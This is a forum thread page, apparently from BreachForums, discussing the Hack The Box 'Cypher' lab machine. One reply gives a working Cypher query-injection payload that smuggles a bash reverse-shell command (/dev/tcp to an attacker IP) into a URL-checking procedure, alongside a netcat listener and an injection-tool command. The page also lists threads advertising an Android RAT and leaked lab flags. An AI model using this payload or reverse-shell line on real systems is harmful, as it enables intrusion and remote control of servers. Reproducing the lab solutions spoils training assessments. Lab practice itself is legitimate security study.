JOIN BREACHFORUMS NEW TELEGRAM
Cypher Hack the Box Season 7 (Linux Medium)
by RedBlock - Saturday March 1, 2025 at 01:37 PM
Breached
Member
Posts: 7
Threads: 0
Joined: Sep 2024
Reputation: 0
#21
Mar 03, 2025, 05:25 PM
how do you guys know that --custom-yara-rule with debug flag might return the file content for privesc? btw can we escalate to root on this machine?
Reply
Breached
Member
Posts: 1
Threads: 0
Joined: Mar 2025
Reputation: 0
#22
Mar 31, 2025, 02:26 PM
(Mar 01, 2025, 07:47 PM)shu8uiuhosduhio Wrote: working with the cypher injection so far no sucess

git clone https://github.com/sectroyer/cyphermap

python3 cyphermap.py -u "http://cypher.htb/api/auth" -d '{"username":"*","password":"Password123"}'

Hi, try this on burpsuit repeter :

{
    "username": "user' return h.value as a union CALL custom.getUrlStatusCode(\"http://cypher.htb; bash -c 'bash -i >& /dev/tcp/10.10.X.X/4444 0>&1'\") YIELD statusCode AS a RETURN a;//",
    "password": "123"
}

and on your machine :
└─# nc -lvnp 4444

Smile
A
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Season10] ROOT Pterodactyl pulsebreaker 58 2,093 2 hours ago
Last Post: Evocator
  Powerful-Android-RAT-2026 opsecmaster67 0 62 3 hours ago
Last Post: opsecmaster67
  Hackers Cave 4 Static Android Blogs opsecmaster67 0 55 3 hours ago
Last Post: opsecmaster67
  Android-Hacker-DEV Mtigating Security In Android opsecmaster67 0 54 3 hours ago
Last Post: opsecmaster67
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 53 4,603 6 hours ago
Last Post: 0xlc13n

Forum Jump:


 Users browsing this forum: 1 Guest(s)